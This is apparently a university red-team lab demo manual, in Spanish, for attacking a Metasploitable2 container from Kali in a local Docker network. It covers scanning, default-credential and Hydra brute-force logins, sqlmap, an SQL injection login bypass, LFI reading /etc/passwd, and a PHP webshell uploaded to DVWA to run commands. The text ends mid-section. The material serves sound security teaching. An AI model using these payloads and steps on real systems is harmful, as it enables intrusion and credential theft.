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color w:val="C00000"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>Manual de Demostración — Red Team Lab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Redes 2 · Ciclo 2026 · Entrega 23 mayo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F3564"/>
        </w:pBdr>
        <w:spacing w:after="80"/>
      </w:pP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Índice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F3564"/>
        </w:pBdr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Requisitos previos](#1-requisitos-previos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Levantar el entorno](#2-levantar-el-entorno)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Verificar conectividad (smoke tests)](#3-verificar-conectividad)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 1 — Reconocimiento](#4-fase-1--reconocimiento)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 2 — Escaneo de puertos](#5-fase-2--escaneo-de-puertos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 3 — Enumeración HTTP](#6-fase-3--enumeración-http)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 4 — Credenciales](#7-fase-4--credenciales)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 5 — Explotación web](#8-fase-5--explotación-web)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 6 — DoS (coordinado con Blue Team)](#9-fase-6--dos)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Fase 7 — Post-explotación](#10-fase-7--post-explotación)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Ver evidencias](#11-ver-evidencias)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Detener el entorno](#12-detener-el-entorno)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>[Referencia rápida de comandos](#13-referencia-rápida)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1. Requisitos previos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Software necesario en el equipo del presentador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Software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Versión mínima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Descarga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 Desktop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4.x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docker.com/products/docker-desktop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Git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2.x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git-scm.com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Terminal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PowerShell 7+ o CMD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incluido en Windows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Clonar el repositorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejecutar </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>una sola vez</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la máquina donde se hará la demo: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git clone https://github.com/govandoh/Red-team-env-project.git C:\Project-Red-Team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cd C:\Project-Red-Team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Si el repositorio ya está clonado, actualizar a la versión más reciente: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cd C:\Project-Red-Team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git pull origin master</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pP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2. Levantar el entorno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Todos los comandos de esta sección se ejecutan en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> desde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>C:\Project-Red-Team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2.1 Iniciar Docker Desktop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Abrir Docker Desktop y esperar a que el ícono de la bandeja del sistema muestre "Docker Desktop is running".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2.2 Construir e iniciar los contenedores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cd C:\Project-Red-Team\docker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compose up -d --build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El primer arranque descarga imágenes (~2-3 GB). Las siguientes veces tarda ~30 segundos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Salida esperada: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[+] Building ...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[+] Running 3/3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✔ Network lab-net              Created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✔ Container redteam-target     Started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✔ Container redteam-kali       Started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2.3 Verificar que ambos contenedores están corriendo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ps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Salida esperada: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CONTAINER ID   IMAGE                      STATUS         NAMES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xxxxxxxxxxxx   kalilinux/kali-rolling     Up X seconds   redteam-kali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xxxxxxxxxxxx   tleemcjr/metasploitable2   Up X seconds   redteam-target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Si </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>redteam-target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> aparece en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Restarting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, esperar 30 segundos y volver a verificar — Metasploitable2 tarda en iniciar todos sus servicios.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2.4 Verificar conectividad básica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ping -c 3 172.20.0.20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Salida esperada:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 paquetes enviados, 0% packet loss.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3. Verificar conectividad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>El proyecto incluye un script de smoke tests que valida el entorno antes de empezar.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/root/scripts/lib/test-common.sh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Salida esperada (6 tests pasando):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[PASS] Target 172.20.0.20 is reachable (ping)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[PASS] SSH port 22 is open on target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[PASS] HTTP port 80 is open on target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[PASS] FTP port 21 is open on target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[PASS] validate_target rejects out-of-scope IP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[PASS] validate_target accepts 172.20.0.20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--- 6/6 passed ---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Si algún test falla, esperar 30 segundos y repetir — Metasploitable2 puede tardar hasta 2 minutos en tener todos los servicios activos.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4. Fase 1 — Reconocimiento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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Descubrir hosts activos en la red, obtener banners de servicios y resolver DNS inverso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Técnicas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ping sweep (nmap -sn), banner grabbing (netcat), DNS reverso (dig).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Ejecutar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/root/scripts/phase-1-recon/recon.sh"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Qué hace el script paso a paso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Ping sweep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Escanea toda la subred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 xml:space="preserve"> para descubrir hosts activos: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nmap -sn 172.20.0.0/24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Banner grabbing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Se conecta a puertos comunes (21, 22, 23, 25, 80, 139, 443, 445, 3306) y captura el banner de cada servicio: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nc -v -w 2 172.20.0.20 &lt;puerto&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>DNS reverso</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Resuelve el nombre de host del target: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dig -x 172.20.0.20 +short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Resultado esperado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================================================================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Phase 1 — Reconnaissance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Target  : 172.20.0.20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Date    : YYYY-MM-DD HH:MM:SS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================================================================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[INFO] Ping sweep over 172.20.0.0/24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[INFO] Banner grabbing on common ports of 172.20.0.20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[INFO] Reverse DNS lookup for 172.20.0.20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[INFO] Evidence saved at: /root/loot/phase-1-recon/&lt;timestamp&gt;/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Evidencia generada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ping-sweep.txt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Hosts activos en 172.20.0.0/24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banners.txt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Banners de cada puerto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dns-reverse.txt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Nombre DNS del target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5. Fase 2 — Escaneo de puertos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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Descubrir todos los puertos abiertos, identificar versiones de servicios y detectar el sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Técnicas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escaneo SYN completo (nmap -sS -p-), fingerprinting de versiones (-sV), detección de OS (-O), scripts NSE de vulnerabilidades.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Duración estimada:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5-10 minutos (escaneo completo de 65535 puertos).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Ejecutar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/root/scripts/phase-2-scanning/port-scan.sh"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Qué hace el script paso a paso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Escaneo SYN completo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> con detección de versión y OS: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nmap -sS -sV -O -p- --min-rate 1000 172.20.0.20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Genera tres archivos de salida: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (texto), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (XML), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.gnmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (grep-able).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Resumen de puertos abiertos</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Extrae y lista solo los puertos en estado </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>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grep "/open/" full-scan.gnmap | tr ',' '\n' | grep "/open/"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Scripts NSE de vulnerabilidades</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Lanza los scripts del módulo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> de nmap: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nmap --script vuln 172.20.0.20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Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Metasploitable2 expone ~30 puertos. Los más relevantes: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21/tcp   open  ftp       vsftpd 2.3.4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22/tcp   open  ssh       OpenSSH 4.7p1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23/tcp   open  telnet    Linux telnetd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25/tcp   open  smtp      Postfix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80/tcp   open  http      Apache/2.2.8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139/tcp  open  netbios   Samba smbd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445/tcp  open  microsoft Samba smbd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3306/tcp open  mysql     MySQL 5.0.51a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5432/tcp open  postgresql PostgreSQL 8.3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Evidencia generada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full-scan.nmap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Salida completa del escaneo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full-scan.xml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Salida XML (importable en Metasploit)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open-ports.txt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Lista limpia de puertos abiertos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vuln-scripts.txt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Vulnerabilidades detectadas por NSE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6. Fase 3 — Enumeración HTTP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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Descubrir directorios y aplicaciones web, detectar vulnerabilidades HTTP conocidas, identificar el stack tecnológico.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Técnicas:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nikto (scanner de vulnerabilidades web), Gobuster (fuerza bruta de directorios), Whatweb (fingerprinting).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Ejecutar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/root/scripts/phase-3-enumeration/enum-http.sh"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Qué hace el script paso a paso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Nikto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Escaneo automatizado de vulnerabilidades HTTP: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nikto -h http://172.20.0.20:80 -o nikto.txt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Detecta: versiones desactualizadas, headers de seguridad faltantes, directorios expuestos, phpinfo expuesto.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Gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Descubrimiento de directorios por fuerza bruta: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gobuster dir -u http://172.20.0.20 -w /usr/share/dirb/wordlists/common.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Whatweb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Fingerprinting del stack tecnológico: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whatweb -v http://172.20.0.20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Resultado esperado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Directorios descubiertos en Metasploitable2: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/dvwa          — Damn Vulnerable Web App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/mutillidae    — Mutillidae (OWASP Top 10 demo)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/phpMyAdmin    — Administración MySQL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/phpinfo.php   — Información del servidor PHP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/twiki         — Wiki vulnerable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/dav           — WebDAV habilitado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Evidencia generada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nikto.txt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Vulnerabilidades y hallazgos HTTP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gobuster.txt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Directorios descubiertos con status codes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whatweb.txt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Stack tecnológico identificado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7. Fase 4 — Credenciales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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obtener acceso autenticado a servicios usando credenciales por defecto conocidas de Metasploitable2.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7.1 Credenciales por defecto (ejecutar primero)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/root/scripts/phase-4-credentials/default-creds.sh"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Qué hace:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>El script prueba 7 pares de credenciales conocidas de Metasploitable2 contra SSH y FTP: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msfadmin:msfadmin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root:root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admin:admin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user:user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postgres:postgres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service:service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vagrant:vagrant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Para SSH usa los flags necesarios para conectarse a OpenSSH 4.7p1 (protocolo legacy):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sshpass -p "msfadmin" ssh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-o KexAlgorithms=+diffie-hellman-group1-sha1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-o "MACs=+hmac-md5,hmac-sha1"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-o HostKeyAlgorithms=+ssh-rsa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172.20.0.20 "id"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Resultado esperado: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[INFO] Trying SSH  msfadmin:msfadmin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ssh,msfadmin,msfadmin,SUCCESS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[INFO] Trying FTP  msfadmin:msfadmin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ftp,msfadmin,msfadmin,SUCCESS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...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[INFO] Summary of successful logins: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ssh,msfadmin,msfadmin,SUCCESS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ftp,msfadmin,msfadmin,SUCCESS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ssh,user,user,SUCCESS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7.2 Brute force con Hydra (opcional si default-creds no encuentra nada)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/root/scripts/phase-4-credentials/brute-force.sh"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Qué hace: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hydra -L /usr/share/wordlists/metasploit/unix_users.txt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-P passwords-100.txt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-t 4 -V -f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ssh://172.20.0.20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Limita a 100 contraseñas para no tardar horas. Si default-creds.sh ya encontró </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>msfadmin:msfadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, este paso es opcional.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Evidencia generada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default-creds-results.txt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CSV con resultado de cada par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hydra-results.txt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Credenciales encontradas por Hydra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8. Fase 5 — Explotación web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b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmar y explotar vulnerabilidades en las aplicaciones web de Metasploitable2.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8.1 SQL Injection — Prueba automatizada con sqlmap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/root/scripts/phase-5-exploitation/web-sqli.sh"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Qué hace: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sqlmap -u "http://172.20.0.20/mutillidae/index.php?page=login.php"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--batch --level=2 --risk=1 --forms --dbs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8.2 SQL Injection — Confirmación manual (demo visual recomendada)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Abrir en el navegador del host (no dentro del contenedor):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http://172.20.0.20/mutillidae/index.php?page=login.php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En el campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ingresar el siguiente payload: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admin' OR '1'='1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En </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ingresar cualquier texto, por ejemplo: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cualquiercosa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Hacer clic en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. La aplicación mostrará el login exitoso y el query SQL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SELECT * FROM accounts WHERE username='admin' OR '1'='1' AND password='cualquiercosa'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Esto confirma inyección SQL: la condición </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>'1'='1'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> siempre es verdadera, bypaseando la autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Para mostrar desde línea de comandos (dentro del Kali):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curl -s -X POST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'http://172.20.0.20/mutillidae/index.php?page=login.php'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-d 'username=admin%27+OR+%271%27%3D%271&amp;password=x&amp;login-php-submit-button=Login'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| grep -i 'logged in\|query\|accounts'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"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8.3 LFI — Local File Inclusion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curl -s 'http://172.20.0.20/mutillidae/index.php?page=../../../../etc/passwd'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| grep -E '^[a-z_][a-z0-9_-]*:x:'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"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Resultado esperado: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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/bin/sh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msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash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Otros archivos que se pueden extraer por LFI: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/etc/hosts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"curl -s 'http://172.20.0.20/mutillidae/index.php?page=../../../../etc/hosts'"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/proc/version (kernel del servidor)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"curl -s 'http://172.20.0.20/mutillidae/index.php?page=../../../../proc/version'"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8.4 File Upload + RCE — Webshell en DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Paso 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificar que DVWA está en modo "low security":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Abrir en el navegador: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http://172.20.0.20/dvwa/security.php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Iniciar sesión con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, seleccionar "low" y guardar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Paso 2 (desde línea de comandos):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Login, upload y verificación de ejecución remota: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# Crear webshell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echo '&lt;?php echo shell_exec(\$_GET[\"cmd\"]); ?&gt;' &gt; /tmp/shell-test.php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# Login a DVWA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curl -s -c /tmp/dvwa.txt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-d 'username=admin&amp;password=password&amp;Login=Login'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-L 'http://172.20.0.20/dvwa/login.php' &gt; /dev/null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# Upload de la shell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curl -s -b /tmp/dvwa.txt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-F 'uploaded=@/tmp/shell-test.php;type=image/jpeg'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-F 'Upload=Upload'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'http://172.20.0.20/dvwa/vulnerabilities/upload/'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| grep -i 'succesfully\|error'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"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Resultado esperado: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../../hackable/uploads/shell-test.php succesfully uploaded!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Paso 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Verificar ejecución remota de código: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echo '=== id ==='; curl -s 'http://172.20.0.20/dvwa/hackable/uploads/shell-test.php?cmd=id'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echo '=== uname -a ==='; curl -s 'http://172.20.0.20/dvwa/hackable/uploads/shell-test.php?cmd=uname+-a'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echo '=== whoami ==='; curl -s 'http://172.20.0.20/dvwa/hackable/uploads/shell-test.php?cmd=whoami'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"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Resultado esperado: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=== id ===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uid=33(www-data) gid=33(www-data) groups=33(www-data)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=== uname -a ===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Linux vulnerable-server ...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=== whoami ===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www-data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8.5 Script completo (LFI + upload automatizados)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/root/scripts/phase-5-exploitation/web-shells.sh"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Evidencia generada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lfi-passwd.txt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Contenido 